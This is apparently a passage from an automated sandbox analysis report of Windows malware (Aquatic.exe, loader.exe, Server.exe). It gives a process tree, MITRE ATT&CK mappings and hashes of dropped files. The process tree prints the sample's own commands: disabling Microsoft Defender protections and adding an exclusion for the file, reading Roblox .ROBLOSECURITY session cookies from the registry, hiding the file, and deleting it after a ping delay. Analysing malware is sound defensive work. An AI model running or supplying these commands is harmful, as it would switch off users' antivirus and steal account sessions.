        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:4240
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3728
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        23⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        24⤵
        
        PID:244
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        24⤵
        System Location Discovery: System Language Discovery
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        24⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        25⤵
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        25⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        25⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        26⤵
        
        PID:2112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:4980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:1744
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        27⤵
        Views/modifies file attributes
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:1972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        27⤵
        
        PID:4752
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        27⤵
        
        PID:3628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:3328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:5088
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2244
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        26⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        26⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        27⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        27⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        27⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        28⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        28⤵
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        28⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        29⤵
        
        PID:5032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:456
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        30⤵
        Views/modifies file attributes
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:1296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:2832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:4500
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:4400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:988
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2644
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        29⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        29⤵
        
        PID:196
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        30⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        30⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        30⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        31⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        31⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        31⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        32⤵
        
        PID:4584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:2456
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        33⤵
        Views/modifies file attributes
        
        PID:1760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:3152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:1064
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        32⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        32⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        33⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        33⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        33⤵
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        34⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        34⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        34⤵
        
        PID:988

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1100

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4144

C:\Users\Admin\AppData\Roaming\Ondrive.exe
C:\Users\Admin\AppData\Roaming\Ondrive.exe
1⤵
PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\d37202ef-b1eb-4ee1-a8ba-2e32ed5befdd.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\0H4QvJbAKGwKnQG

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\0H4QvJbAKGwKnQG

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe

Filesize
229KB

MD5
56c788116da32ec8e9ac3b1b0e66b520

SHA1
545f203f2bdf6fac2f131a76a5f36e21637b27ca

SHA256
f67268d2659ceb1e8cf8a7560784372294bcd8f249f7c0efdf33216722a5f0bb

SHA512
7da85b8e5f92f4a448a10f5c60c21f46b3eb511fda461b15956339ca7130c901e05ad58856a3a3903cdb52b81c4051d3bb0222e87aefab87136351d1ff01734f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gu66Bvj4S8lf68q\Display\Display.png

Filesize
418KB

MD5
c46e5e010cf2fa6090f0cc7104921683

SHA1
539dba3ee30900117f6da1dd3e9c85ae99d29386

SHA256
0424bb6a452dd3d74b7761e1ca80e2d3b53c359f53e2eb7c3510b346974803f9

SHA512
d70b6bad40a775ae02ee488f309834964ccf9219958204e2ef9cd7fbb3b70bcd14ba23add5483dc86e922e580c4fd0dca14217a0b658cd8a5e4e5fc4b0c764c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
63KB

MD5
1524882af71247adecf5815a4e55366a

SHA1
e25014c793c53503bdff9af046140edda329d01b

SHA256
6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327

SHA512
5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd

Filesize
116KB

MD5
9ea8098d31adb0f9d928759bdca39819

SHA1
e309c85c1c8e6ce049eea1f39bee654b9f98d7c5

SHA256
3d9893aa79efd13d81fcd614e9ef5fb6aad90569beeded5112de5ed5ac3cf753

SHA512
86af770f61c94dfbf074bcc4b11932bba2511caa83c223780112bda4ffb7986270dc2649d4d3ea78614dbce6f7468c8983a34966fc3f2de53055ac6b5059a707

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

Filesize
4.9MB

MD5
7a6a8c2a8c379b111cdceb66b18d687d

SHA1
f3b8a4c731fa0145f224112f91f046fddf642794

SHA256
8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b

SHA512
f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

Filesize
771KB

MD5
64acb046fe68d64ee475e19f67253a3c

SHA1
d9e66c9437ce6f775189d6fdbd171635193ec4cc

SHA256
b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10

SHA512
f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\pywintypes311.dll

Filesize
131KB

MD5
90b786dc6795d8ad0870e290349b5b52

SHA1
592c54e67cf5d2d884339e7a8d7a21e003e6482f

SHA256
89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a

SHA512
c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\regex\_regex.pyd

Filesize
665KB

MD5
09b6849c207e6d83f7f39e72672b9ae5

SHA1
008621fed39e91c5ab485c01600e6ca17bec8c27

SHA256
5dc7044d63a7f9d15bf0431d8538631e3df058b3d8403b60c745b51bebd04980

SHA512
6634b06206519c666a1ab1b874fd092f97c7de2540630a6a9e5bce7b08145f343cc29d70b621ea0cc4026592155a92a63eb21e8409946c23d070724f1b7e812f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tcl86t.dll

Filesize
1.8MB

MD5
ac6cd2fb2cd91780db186b8d6e447b7c

SHA1
b387b9b6ca5f0a2b70028ab2147789c4fe24ef7a

SHA256
a91781fe13548b89817462b00058a75fb0b607ec8ce99d265719ced573ade7b6

SHA512
45b24ca07a44d8d90e5efeded2697a37f000b39d305fe63a67292fdd237de3f8efd5e85b139b5702faa695f9f27f12f24ac497e005e2f3c24c141d7cd85305b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tls_client\dependencies\tls-client-64.dll

Filesize
15.7MB

MD5
6b0b5bb89d4fab802687372d828321b4

SHA1
a6681bee8702f7abbca891ac64f8c4fb7b35fbb5

SHA256
ec4f40c5f1ac709313b027c16face4d83e0dafdbc466cff2ff5d029d00600a20

SHA512
50c857f4a141ad7db8b6d519277033976bf97c9a7b490186a283403c05cb83b559a596efaf87ca46bc66bdf6b80636f4622324551c9de2c26bebfdbb02209d34

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\zstandard\backend_c.pyd

Filesize
512KB

MD5
dc08f04c9e03452764b4e228fc38c60b

SHA1
317bcc3f9c81e2fc81c86d5a24c59269a77e3824

SHA256
b990efbda8a50c49cd7fde5894f3c8f3715cb850f8cc4c10bc03fd92e310260f

SHA512
fbc24dd36af658cece54be14c1118af5fda4e7c5b99d22f99690a1fd625cc0e8aa41fd9accd1c74bb4b03d494b6c3571b24f2ee423aaae9a5ad50adc583c52f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUDOiFXaVwJdUyN

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
71KB

MD5
f9b08bd21b40a938122b479095b7c70c

SHA1
eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

SHA256
c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

SHA512
fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_akyxfab0.iis.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\eat0hKQ9LM9qn64

Filesize
20KB

MD5
ffdbce8286b4f16cf25e6e681e2680e7

SHA1
e8bcb93be3d078c3358d20965948b2cf630d7f07

SHA256
9ab4f0e5244872c9f6da9219f6ccf4b9ef0771427019c0572567442c23f84cd0

SHA512
4641027794e30c13df3e6dd2e65d0ec5f7cbf0ab6825c7168a72409ddc4c85beaa22dea9b615857741514bbc5cc7cd12f16fe845de544f8390ff656085d31933

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
5.1MB

MD5
24b1beaf827ed5732cc435c76170afb0

SHA1
dbab0b15b40f22765af4219d6db16579396b0ae7

SHA256
5365a7256f9b85da3eb0aaaf1ddf50ee2928c0d3b23b89a21a9400b6502ad4f2

SHA512
00cf09d9066d654776d835597cfa228b7b33a4a083e8564c172d3ac78bf249feb87187e88de22be4720484d60a34dfbfd4f47bff404960627bde4837d896e4ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
